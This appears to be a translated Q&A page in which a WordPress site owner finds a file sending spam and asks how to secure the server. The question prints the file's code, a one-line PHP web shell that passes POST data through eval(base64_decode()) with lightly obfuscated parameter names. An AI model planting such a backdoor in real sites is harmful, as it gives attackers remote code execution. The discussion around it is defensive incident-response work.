red*_*000 8 php security wordpress spam malware
我的托管服务提供商最近暂停了我的网站,因为它上面发送了大量垃圾邮件.最初我和提供商认为这是由于几天前我在服务器上放置的电子邮件活动的不安全形式.我从服务器上删除了带有表单的页面,但服务器仍在发送垃圾邮件.
我在服务器根目录的"css"文件夹中找到了一个名为7c32.php的php文件.我绝对没有成功.这是文件中的代码:
<?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}?>
Run Code Online (Sandbox Code Playgroud)
通过在线解码器运行后,这就是它的结果:
if(isset($_POST["code"])){eval(base64_decode($_POST["code"]));
Run Code Online (Sandbox Code Playgroud)
我做了一些关于恶意php文件的阅读,并看到了eval(和base64_decode字符串非常可疑.我浏览了服务器日志文件,看到了几个来自沙特阿拉伯的ip地址的7c32.php文件的帖子查询.
我删除了php文件,更新了所有过时的wordpress主题和插件(以及自己的平台,并将密码更改为FTP服务器和Wordpress管理帐户更安全的东西.
我还能做些什么来确保我的服务器安全吗?我即将去搜索这些base64和eval(服务器上每个其他php文件中的字符串,但除此之外,我没有想法.
这个PHP脚本似乎太短了不能造成任何损害,但还有什么可以发送所有垃圾邮件?
任何帮助将不胜感激.
eval()是一种非常危险的小语言结构,因为它实际上可以执行作为字符串传递给它的任何 PHP 代码,因此它肯定可能是发送邮件的脚本,尽管发送垃圾邮件实际上是相当非破坏性的eval() 可以做。
如果您的页面有权删除 Web 根目录中的每个文件,eval()那么也可以这样做,只需有人通过 POST 向脚本发送正确的命令即可。
如果您确实想确保发送邮件的是那段代码,请将其放回原处,但根据您的需要进行修改。停止使用eval()并将 POST 数据保存到数据库或文本文件中。这是您准确了解该代码用途的唯一方法。
| 归档时间: |
|
| 查看次数: |
4693 次 |
| 最近记录: |